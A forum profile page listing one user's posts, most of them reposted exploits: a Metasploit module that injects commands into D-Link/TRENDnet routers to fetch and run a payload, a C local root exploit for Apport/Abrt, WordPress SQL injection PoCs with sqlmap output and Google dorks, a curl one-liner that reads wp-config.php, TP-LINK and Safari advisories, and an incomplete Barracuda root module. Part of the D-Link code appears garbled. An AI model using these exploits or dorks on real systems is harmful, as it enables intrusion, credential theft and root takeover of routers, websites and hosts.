Jump to content

KhiZaRix

Active Members
  • Posts

    245
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by KhiZaRix

  1. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # Only tested on Emulated environment include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link/TRENDnet NCC Service Command Injection', 'Description' => %q{ This module exploits a remote command injection vulnerability on several routers. The vulnerability exists in the ncc service, while handling ping commands. This module has been tested on a DIR-626L emulated environment only. Several D-Link and TRENDnet devices are reported as affected, including: D-Link DIR-626L (Rev A) v1.04b04, D-Link DIR-636L (Rev A) v1.04, D-Link DIR-808L (Rev A) v1.03b05, D-Link DIR-810L (Rev A) v1.01b04, D-Link DIR-810L (Rev v2.02b01, D-Link DIR-820L (Rev A) v1.02B10, D-Link DIR-820L (Rev A) v1.05B03, D-Link DIR-820L (Rev v2.01b02, D-Link DIR-826L (Rev A) v1.00b23, D-Link DIR-830L (Rev A) v1.00b07, D-Link DIR-836L (Rev A) v1.01b03 and TRENDnet TEW-731BR (Rev 2) v2.01b01 }, 'Author' => [ 'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery and initial PoC 'Tiago Caetano Henriques', # Vulnerability discovery and initial PoC 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-1187'], ['BID', '72816'], ['URL', 'https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2'], ['URL', 'http://seclists.org/fulldisclosure/2015/Mar/15'], ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10052'] ], 'Targets' => # Only tested on D-Link DIR-626L where wget is available [ [ 'Linux mipsel Payload', { 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux' } ], [ 'Linux mipsbe Payload', { 'Arch' => ARCH_MIPSBE, 'Platform' => 'linux' } ], ], 'DisclosureDate' => 'Feb 26 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]), OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]), OptString.new('TARGETURI', [true, 'The base path to the vulnerable application area', '/ping.ccp']), OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 10]) ], self.class) end def check begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }) # unknown if other devices also using mini_httpd if res && [500].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exec_command(cmd, timeout = 20) begin res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'encode_params' => false, 'vars_post' => { 'ccp_act' => 'ping_v6', 'ping_addr' => '$(' + cmd + ')' } }, timeout) return res rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def primer @payload_url = get_uri wget_payload end def exploit print_status("#{peer} - Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL") end print_status("#{peer} - Exploiting...") @pl = generate_payload_exe @payload_url = '' @dropped_elf) print_status("#{peer} - Executing the payload...") res = exec_command(cmd, 1) unless res fail_with(Failure::Unknown, "#{peer} - Unable to exec payload") end Rex.sleep(1) end # Handle incoming requests to the HTTP server def on_request_uri(cli, request) print_status("Request: #{request.uri}") if request.uri =~ /#{Regexp.escape(get_resource)}/ print_status('Sending payload...') send_response(cli, @pl) end end end Source: http://packetstorm.wowhacker.com/1504-exploits/multi_ncc_ping_exec.rb.txt
  2. B?nuiesc c? are ?i un pre-order pe PC , nu? dac? are , contul are ni?te b?nu?i pe acolo , în fine , eu zic c? pre?ul este îndeajuns de ieftin , merit?..
  3. Project Description Tera Term is Tera Term Pro 2.3 succession version and is being officially recognized by the original author. Tera Term is open source free software terminal emulator supporting UTF-8 protocol. Now TTSSH supports SSH2 protocol (Original version supports SSH1). B?ie?a?i de la CISCO îl mai folosesc Deci cu progr?melu te conectezi la ce vrea mu?chiule?ul t?u , ssh , telnet etc.. Source: Tera Term Open Source Project Download: Download Files List - Tera Term - SourceForge.JP //:Edit: Version 4.86
  4. ###################### # Exploit Title : Wordpress Ajax Store Locator <= 1.2 SQL Injection Vulnerability # Exploit Author : Claudio Viviani # Vendor Homepage : WordPress - Ajax Store Locator - Wordpress | CodeCanyon # Software Link : Premium # Dork Google: inurl:ajax-store-locator # index of ajax-store-locator # Date : 2015-03-29 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox ###################### # Info: The "sl_dal_searchlocation_cbf" ajax function is affected from SQL Injection vulnerability "StoreLocation" var is not sanitized # PoC Exploit: http://TARGET/wordpress/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ) StoreLocation's value must contain "~" delimiter $storeLoc = $_REQUEST["StoreLocation"]; ... ... $qryVal = explode("~", $storeLoc); $sql_query = "SELECT a.*,b.*, 0 as ......... LEFT JOIN `$sl_tb_pluginset` as b ON (1=1) WHERE a.id=$qryVal[1]" # PoC sqlmap: sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1" -p StoreLocation --dbms mysql [18:24:11] [iNFO] GET parameter 'StoreLocation' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] [18:24:18] [iNFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [18:24:18] [iNFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [18:24:24] [iNFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [18:24:29] [iNFO] checking if the injection point on GET parameter 'StoreLocation' is a false positive GET parameter 'StoreLocation' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 89 HTTP(s) requests: --- Parameter: StoreLocation (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1 AND (SELECT * FROM (SELECT(SLEEP(5)))LCKZ) --- [18:29:48] [iNFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 5.10 web application technology: PHP 5.3.3, Apache 2.2.3 back-end DBMS: MySQL 5.0.12 ##################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog archive_exploit Archives - HomeLab IT - Virtualization, Security, Linux Blog (Full HomelabIT Archive Exploit) F.F.H.D - Free Fuzzy Hashes Database (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpajaxstorelocator-sql.txt
  5. KhiZaRix

    Salut

    Bine ai venit.
  6. English: The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually. Roman?: Zed Attack Proxy ( ZAP ) este un instrument u?or de folosit , integrat ca tool de pentesting pentru identificarea vulnerabilit??ilor în aplica?iile web. Acesta este conceput pentru a fi utilizat de c?tre persoane cu o gam? larg? de experien?? în securitate ?i, ca atare este ideal pentru dezvoltatori ?i cei noi în Pentesting. ZAP prevede scanere automate , precum ?i un set de instrumente care v? permit s? g?si?i vulnerabilit??i de securitate manual . Windows ? Download: Zed Attack Proxy 2.4.0 Windows Installer ? Packet Storm Linux ? Download: Zed Attack Proxy 2.4.0 Linux Release ? Packet Storm MAC OS X ? Download: Zed Attack Proxy 2.4.0 Mac OS X Release ? Packet Storm Source: Packet Storm
  7. #define _GNU_SOURCE #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <signal.h> #include <elf.h> #include <err.h> #include <syslog.h> #include <sched.h> #include <linux/sched.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/auxv.h> #include <sys/wait.h> # warning this file must be compiled with -static // // Apport/Abrt Vulnerability Demo Exploit. // // Apport: CVE-2015-1318 // Abrt: CVE-2015-1862 // // -- [EMAIL="taviso@cmpxchg8b.com"]taviso@cmpxchg8b.com[/EMAIL], April 2015. // // $ gcc -static newpid.c // $ ./a.out // uid=0(root) gid=0(root) groups=0(root) // sh-4.3# exit // exit // // Hint: To get libc.a, // yum install glibc-static or apt-get install libc6-dev // int main(int argc, char **argv) { int status; Elf32_Phdr *hdr; pid_t wrapper; pid_t init; pid_t subprocess; unsigned i; // Verify this is a static executable by checking the program headers for a // dynamic segment. Originally I thought just checking AT_BASE would work, // but that isnt reliable across many kernels. hdr = (void *) getauxval(AT_PHDR); // If we find any PT_DYNAMIC, then this is probably not a static binary. for (i = 0; i < getauxval(AT_PHNUM); i++) { if (hdr[i].p_type == PT_DYNAMIC) { err(EXIT_FAILURE, "you *must* compile with -static"); } } // If execution reached here, it looks like we're a static executable. If // I'm root, then we've convinced the core handler to run us, so create a // setuid root executable that can be used outside the chroot. if (getuid() == 0) { if (chown("sh", 0, 0) != 0) exit(EXIT_FAILURE); if (chmod("sh", 04755) != 0) exit(EXIT_FAILURE); return EXIT_SUCCESS; } // If I'm not root, but euid is 0, then the exploit worked and we can spawn // a shell and cleanup. if (setuid(0) == 0) { system("id"); system("rm -rf exploit"); execlp("sh", "sh", NULL); // Something went wrong. err(EXIT_FAILURE, "failed to spawn root shell, but exploit worked"); } // It looks like the exploit hasn't run yet, so create a chroot. if (mkdir("exploit", 0755) != 0 || mkdir("exploit/usr", 0755) != 0 || mkdir("exploit/usr/share", 0755) != 0 || mkdir("exploit/usr/share/apport", 0755) != 0 || mkdir("exploit/usr/libexec", 0755) != 0) { err(EXIT_FAILURE, "failed to create chroot directory"); } // Create links to the exploit locations we need. if (link(*argv, "exploit/sh") != 0 || link(*argv, "exploit/usr/share/apport/apport") != 0 // Ubuntu || link(*argv, "exploit/usr/libexec/abrt-hook-ccpp") != 0) { // Fedora err(EXIT_FAILURE, "failed to create required hard links"); } // Create a subprocess so we don't enter the new namespace. if ((wrapper = fork()) == 0) { // In the child process, create a new pid and user ns. The pid // namespace is only needed on Ubuntu, because they check for %P != %p // in their core handler. On Fedora, just a user ns is sufficient. if (unshare(CLONE_NEWPID | CLONE_NEWUSER) != 0) err(EXIT_FAILURE, "failed to create new namespace"); // Create a process in the new namespace. if ((init = fork()) == 0) { // Init (pid 1) signal handling is special, so make a subprocess to // handle the traps. if ((subprocess = fork()) == 0) { // Change /proc/self/root, which we can do as we're privileged // within the new namepace. if (chroot("exploit") != 0) { err(EXIT_FAILURE, "chroot didnt work"); } // Now trap to get the core handler invoked. __builtin_trap(); // Shouldn't happen, unless user is ptracing us or something. err(EXIT_FAILURE, "coredump failed, were you ptracing?"); } // If the subprocess exited with an abnormal signal, then everything worked. if (waitpid(subprocess, &status, 0) == subprocess) return WIFSIGNALED(status) ? EXIT_SUCCESS : EXIT_FAILURE; // Something didn't work. return EXIT_FAILURE; } // The new namespace didn't work. if (waitpid(init, &status, 0) == init) return WIFEXITED(status) && WEXITSTATUS(status) == EXIT_SUCCESS ? EXIT_SUCCESS : EXIT_FAILURE; // Waitpid failure. return EXIT_FAILURE; } // If the subprocess returned sccess, the exploit probably worked, reload // with euid zero. if (waitpid(wrapper, &status, 0) == wrapper) { // All done, spawn root shell. if (WIFEXITED(status) && WEXITSTATUS(status) == 0) { execl(*argv, "w00t", NULL); } } // Unknown error. err(EXIT_FAILURE, "unexpected result, cannot continue"); } Source: http://packetstorm.wowhacker.com/1504-exploits/apportabrt-exec.txt
  8. ###################### # Exploit Title : Wordpress Video Gallery 2.8 SQL Injection Vulnerabilitiey # Exploit Author : Claudio Viviani # Vendor Homepage : WordPress Video Gallery - Best YouTube and Vimeo Video Gallery Plugin # Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip # Dork Google: inurl:/wp-admin/admin-ajax.php?action=googleadsense # Date : 2015-04-04 # Tested on : Windows 7 / Mozilla Firefox Linux / Mozilla Firefox ###################### # Description Wordpress Video Gallery 2.8 suffers from SQL injection Location file: /contus-video-gallery/hdflvvideoshare.php add_action('wp_ajax_googleadsense' ,'google_adsense'); add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense'); function google_adsense(){ global $wpdb; $vid = $_GET['vid']; $google_adsense_id = $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid); $query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id); $google_adsense = unserialize($query); echo $google_adsense['googleadsense_code']; die(); $vid = $_GET['vid']; is not sanitized ###################### # PoC http://target/wp-admin/admin-ajax.php?action=googleadsense&vid=[sqli] ###################### # Vulnerability Disclosure Timeline: 2015-04-04: Discovered vulnerability 2015-04-06: Vendor Notification 2015-04-06: Vendor Response/Feedback 2015-04-07: Vendor Send Fix/Patch (same version number) 2015-04-13: Public Disclosure ####################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog F.F.H.D - Free Fuzzy Hashes Database (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpvideogallery28-sql.txt
  9. OVERVIEW ========== The 4/8/2015 security updates from Apple included a patch for a Safari cross-domain vulnerability. An attacker could create web content which, when viewed by a target user, bypasses some of the normal cross-domain restrictions to access or modify HTTP cookies belonging to any website. Most websites which allow user logins store their authentication information (usually session keys) in cookies. Access to these cookies would allow hijacking authenticated sessions. Cookies can also contain other sensitive information. All tested Safari versions on iOS, OS X, and Windows were vulnerable. The number of affected devices may be of the order of 1 billion. Technically, the attacker can spoof the âdocument.domainâ property. Itâs possible that this could lead to compromise of other resources apart from cookies. However, cookies was the only practical attack scenario found with the tested versions of Safari. The HttpOnly and Secure cookie flags represent an important mitigating factor albeit with some caveats (see below). DETAILS ======== Safari supports the FTP URL scheme allowing HTML documents to be accessed via URLs beginning with "ftp://". These URLs can be of the form [url]ftp://user:password@host/path[/url]. The problem arises when encoded special characters are used in the user or password parts. Consider the following URL: [url]ftp://user%40attacker.com%2Fexploit.html%23@apple.com/[/url] If correctly interpreted, the URL refers to a document on apple.com. However, when loaded by a vulnerable browser, the network layer uses an extraneously decoded version of the URL: [url]ftp://user@attacker.com/exploit.html#apple.com/[/url] The document would be loaded from attacker.com, not apple.com. Yet the document properties such as âdocument.domainâ and âdocument.cookieâ are correctly initialised using âapple.comâ. The attacker-supplied document, exploit.html, can therefore access and modify cookies belonging to apple.com via JavaScript. Itâs possible that cookies arenât the only resource accessible this way, but at least recent Safari versions (tested desktop only) use the document origin instead of only host or domain for most other access control, e.g. password autofilling and geolocation permissions. The attack can be performed on normal web pages by embedding an IFRAME pointing to an FTP URL. MITIGATING FACTORS =================== The cookie attack requires JavaScript so existing cookies with the HttpOnly flag canât be seen by the attacker. Support for this flag reportedly appeared in Safari 4. Earlier versions would be vulnerable even with the HttpOnly flag. Safari allows (over)writing of HttpOnly cookies so the flag doesnât prevent this vulnerability to be exploited for session fixation and similar attacks. Cookies with the Secure flag arenât accessible for documents loaded via FTP. VULNERABLE VERSIONS ===================== The following versions were tested and found vulnerable: - Safari 7.0.4 on OS X 10.9.3 - Safari on iPhone 3GS, iOS 6.1.6 - Safari on iOS 8.1 simulator - Safari 5.1.7 on Windows 8.1 Earlier versions werenât available for testing, but according to available statistics their usage should be negligible. SOLUTION ========= Apple was notified on January 27, 2015. The following patches were released in April 2015: - APPLE-SA-2015-04-08-3 iOS 8.3 - iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later - APPLE-SA-2015-04-08-1 Safari 8.0.5, Safari 7.1.5, and Safari 6.2.5 - OS X Mountain Lion, Mavericks, Yosemite For more information see: [url]https://support.apple.com/en-us/HT201222[/url] WORKAROUND ============= The attacker has to set up an FTP server or use an existing public one. Such server can run on any TCP/IP port number. One way to stop such attacks (e.g. for older devices with no available patch) would be to deny all traffic to the public internet and configure the device to use a HTTP proxy located in the internal network. This should prevent access to all FTP URLs. CREDITS ======== The vulnerability was found and researched by Jouko Pynn??nen of Klikki Oy, Finland. -- Jouko Pynnonen <jouko@iki.fi> Klikki Oy - [url=http://klikki.fi]Klikki Oy -[/url] - @klikkioy Source: http://packetstorm.wowhacker.com/1504-exploits/safari-crossdomain.txt
  10. Fusion Engage is a commercial wordpress plugin sold by internet marketer (and known scammer) Precious Ngwu to.. I'm actually not sure. Something to do with video embedding. Anyway, it has a LFD. Here's the relevant code.. function fe_get_sv_html(){ global $wpdb, $video_db, $ann_db; print(file_get_contents($_POST['video'])); wp_die(); }add_action('wp_ajax_nopriv_fe_get_sv_html', 'fe_get_sv_html');add_action('wp_ajax_fe_get_sv_html', 'fe_get_sv_html'); So, you can exploit it easily... quick curl one-liner to get wp-config.php: curl --data "action=fe_get_sv_html&video=../wp-config.php" "http://exploitable-site/wp-admin/admin-ajax.php" Precious Ngwu cares not at all about support, and last time I found security issues in his products he did not reply to me whatsoever. So, full disclosure on this one straight away, maybe someone else can contact him and "convince" him to put out an update, all I say to that is: good luck... Quick google dork: inurl:plugins inurl:fusion-engage - slipstream/raylee - twitter: @Thewack0lian Source: http://packetstorm.wowhacker.com/1504-exploits/wpfusionengage-disclose.txt
  11. SEC Consult Vulnerability Lab Security Advisory < 20150410-0 > ======================================================================= title: Unauthenticated Local File Disclosure product: Multiple TP-LINK products (see Vulnerable / tested versions) vulnerable version: Multiple (see Vulnerable / tested versions) fixed version: see Solution CVE number: CVE-2015-3035 impact: Critical homepage: Welcome to TP-LINK found: 2015-02-19 by: Stefan Viehb??ck (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "TP-LINK is a global provider of SOHO & SMB networking products and the World's No.1 provider of WLAN products, with products available in over 120 countries to tens of millions customers. Committed to intensive R&D, efficient production and strict quality management, TP-LINK continues to provide award-winning networking products in Wireless, ADSL, Routers, Switches, IP Cameras, Powerline Adapters, Print Servers, Media Converters and Network Adapters for Global end-users." Source: About TP-LINK - Welcome to TP-LINK Business recommendation: ------------------------ Attackers can read sensitive configuration files without prior authentication. These files e.g. include the administrator credentials and the WPA passphrase. TP-LINK has provided fixed firmware which should be installed immediately. Vulnerability overview/description: ----------------------------------- Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed. Proof of concept: ----------------- The following HTTP request shows how directory traversal can be used to gain access to files without prior authentication: =============================================================================== GET /login/../../../etc/passwd HTTP/1.1 Host: $host =============================================================================== The server response includes the contents of the file: =============================================================================== HTTP/1.1 200 OK Server: Router Webserver Connection: Keep-Alive Keep-Alive: Persist: WWW-Authenticate: Basic realm="TP-LINK Wireless Dual Band Gigabit Router WDR4300" Content-Length: 683 Content-Type: text/html root:x:0:0:root:/root:/bin/sh Admin:x:0:0:root:/root:/bin/sh bin:x:1:1:bin:/bin:/bin/sh daemon:x:2:2:daemon:/usr/sbin:/bin/sh adm:x:3:4:adm:/adm:/bin/sh lp:x:4:7:lp:/var/spool/lpd:/bin/sh sync:x:5:0:sync:/bin:/bin/sync shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh operator:x:11:0:Operator:/var:/bin/sh nobody:x:65534:65534:nobody:/home:/bin/sh ap71:x:500:0:Linux User,,,:/root:/bin/sh dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh admin:x:500:500:admin:/home:/bin/sh guest:x:500:500:guest:/home:/bin/sh dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh =============================================================================== Several sensitive files can be read. These include: Files containing Wi-Fi configuration including WPA-passphrase: /login/../../../tmp/ath.ap_bss /login/../../../tmp/ath1.ap_bss A file containing administrator credentials (format: $user:md5($password), which can be brute-forced very efficiently: /login/../../../tmp/dropbear/dropbearpwd Example server response: =============================================================================== HTTP/1.1 200 OK Server: Router Webserver Connection: Keep-Alive Keep-Alive: Persist: WWW-Authenticate: Basic realm="TP-LINK Wireless Dual Band Gigabit Router WDR4300" Content-Length: 56 Content-Type: text/html username:admin password:11d0fc2ff3e7862d8a3f9b280e6d390c =============================================================================== Vulnerable / tested versions: ----------------------------- The vulnerability affects the following products: TP-LINK Archer C5 (Hardware version 1.2) TP-LINK Archer C7 (Hardware version 2.0) TP-LINK Archer C8 (Hardware version 1.0) TP-LINK Archer C9 (Hardware version 1.0) TP-LINK TL-WDR3500 (Hardware version 1.0) TP-LINK TL-WDR3600 (Hardware version 1.0) TP-LINK TL-WDR4300 (Hardware version 1.0) TP-LINK TL-WR740N (Hardware version 5.0) TP-LINK TL-WR741ND (Hardware version 5.0) TP-LINK TL-WR841N (Hardware version 9.0) TP-LINK TL-WR841N (Hardware version 10.0) TP-LINK TL-WR841ND (Hardware version 9.0) TP-LINK TL-WR841ND (Hardware version 10.0) Vendor contact timeline: ------------------------ 2015-02-19: Contacting vendor through support@tp-link.com. 2015-02-24: Resending email as previous ticket has been closed by TP-LINK. 2015-02-24: Contacting technical support engineer of TP-LINK, contact received by 3rd party. 2015-02-25: Requesting encryption keys, providing affected models. 2015-02-26: No encryption keys available, sending advisory in unencrypted form. 2015-02-28: Vendor confirms vulnerability, provides beta firmware. 2015-03-03: Sending confirmation that beta firmware fixes the vulnerability. 2015-03-06: Vendor is working on release schedule, affected devices. 2015-03-16: Vendor announces that fixed firmware will be released by the end of March. 2015-03-24: Vendor confirms that firmware releases are on schedule. 2015-04-08: Vendor provides final list of affected products & download URLs. 2015-04-10: Coordinated release of security advisory. Solution: --------- Update to the most recent firmware version: TP-LINK Archer C5 (Hardware version 1.2): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13048 TP-LINK Archer C7 (Hardware version 2.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13008 TP-LINK Archer C8 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13052 TP-LINK Archer C9 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13020 TP-LINK TL-WDR3500 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13018 TP-LINK TL-WDR3600 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13019 TP-LINK TL-WDR4300 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13009 TP-LINK TL-WR740N (Hardware version 5.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13012 TP-LINK TL-WR741ND (Hardware version 5.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13013 TP-LINK TL-WR841N (Hardware version 9.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13033 TP-LINK TL-WR841N (Hardware version 10.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13036 TP-LINK TL-WR841ND (Hardware version 9.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13035 TP-LINK TL-WR841ND (Hardware version 10.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13037 Workaround: ----------- See solution. Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Stefan Viehb??ck / @2015 Source: http://packetstorm.wowhacker.com/1504-exploits/SA-20150410-0.txt
  12. ###################### # Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF # Exploit Author : Claudio Viviani # Vendor Homepage : WordPress Duplicator - Copy, Move, Clone or Backup your WordPress # Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip # Date : 2015-04-08 # Tested on : Linux / Mozilla Firefox ###################### # Description Wordpress Duplicator 0.5.14 suffers from remote SQL Injection Vulnerability Location file: /view/actions.php This is the bugged ajax functions wp_ajax_duplicator_package_delete: function duplicator_package_delete() { DUP_Util::CheckPermissions('export'); try { global $wpdb; $json = array(); $post = stripslashes_deep($_POST); $tblName = $wpdb->prefix . 'duplicator_packages'; $postIDs = isset($post['duplicator_delid']) ? $post['duplicator_delid'] : null; $list = explode(",", $postIDs); $delCount = 0; if ($postIDs != null) { foreach ($list as $id) { $getResult = $wpdb->get_results("SELECT name, hash FROM `{$tblName}` WHERE id = {$id}", ARRAY_A); if ($getResult) { $row = $getResult[0]; $nameHash = "{$row['name']}_{$row['hash']}"; $delResult = $wpdb->query("DELETE FROM `{$tblName}` WHERE id = {$id}"); if ($delResult != 0) { $post['duplicator_delid'] variable is not sanitized A authorized user with "export" permission or a remote unauthenticated attacker could use this vulnerability to execute arbitrary SQL queries on the victim WordPress web site by enticing an authenticated admin (CSRF) ###################### # PoC http://target/wp-admin/admin-ajax.php?action=duplicator_package_delete POST: duplicator_delid=1 and (select * from (select(sleep(20)))a) ###################### # Vulnerability Disclosure Timeline: 2015-04-08: Discovered vulnerability 2015-04-08: Vendor Notification 2015-04-09: Vendor Response/Feedback 2015-04-10: Vendor Send Fix/Patch 2015-04-10: Public Disclosure ####################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog F.F.H.D - Free Fuzzy Hashes Database (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpduplicator-sqlxsrf.txt
  13. # Exploit Title: Barracuda Firmware <= 5.0.0.012 Post Auth Remote Root exploit # Exploit Author: xort # Vendor Homepage: https://www.barracuda.com/ # Software Link: https://www.barracuda.com/products/webfilter # Version: Firmware <= 5.0.0.012 # Tested on: Vx and Hardware platforms # # Postauth remote root in Barracuda Firmware <= 5.0.0.012 for any under priviledged user with report generating # capablities. This exploit leverages a command injection bug along with poor sudo permissions to obtain # root. xort@blacksecurity.org require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root', 'Description' => %q{ This module exploits a remote command execution vulnerability in the Barracuda Firmware Version <= 5.0.0.012 by exploiting a vulnerability in the web administration interface. By sending a specially crafted request it's possible to inject system commands while escalating to root do to relaxed sudo configuration on the local machine. }, 'Author' => [ 'xort', # metasploit module ], 'Version' => '$Revision: 12345 $', 'References' => [ [ 'none', 'none'], ], 'Platform' => [ 'linux'], 'Privileged' => true, 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell' ], 'Privileged' => false, 'Payload' => { # note: meterpreter can't run on host do to kernel 2.4 incompatibilities + this is stable 'Compat' => { 'ConnectionType' => 'find', } }, 'Targets' => [ ['Linux Universal', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 0)) register_options( [ OptString.new('PASSWORD', [ false, 'Device password', "" ]), OptString.new('ET', [ false, 'Device password', "" ]), OptString.new('USERNAME', [ true, 'Device password', "admin" ]), OptString.new('CMD', [ false, 'Command to execute', "" ]), Opt::RPORT(8000), ], self.class) end def do_login(username, password, et) vprint_status( "Logging into machine with credentials...\n" ) # timeout timeout = 1550; # params password_clear = "admin" real_user = ""; login_state = "out" enc_key = 